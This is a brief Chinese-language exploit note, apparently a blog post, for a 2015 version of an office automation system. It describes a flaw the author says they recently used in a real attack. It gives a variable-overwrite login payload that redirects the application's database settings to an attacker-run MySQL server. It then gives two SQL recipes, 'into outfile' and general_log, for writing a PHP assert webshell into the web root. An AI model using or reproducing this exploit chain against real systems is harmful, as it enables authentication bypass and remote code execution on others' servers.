版本 2015, 乌云平台上的漏洞, 正好最近实战也用到了
变量覆盖
/logincheck.php
post 数据
USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=MYSQL_HOST&MYOA_MASTER_DB[user]=MYSQL_USER&MYOA_MASTER_DB[pwd]=MYSQL_PASSWORD&MYOA_MASTER_DB[db]=MYSQL_DATABASE
mysql 数据库需要自己部署
TD_OA.sql
getshell
后台有 sql 导入功能, 有两种方法, 使用 into outfile
或者用 general_log
1
2
3
4
5
|
update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;
|
1
2
3
4
|
set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '<?php assert($_POST[a]) ?>';
set global general_log = off;
|
保存为 sql 文件然后上传即可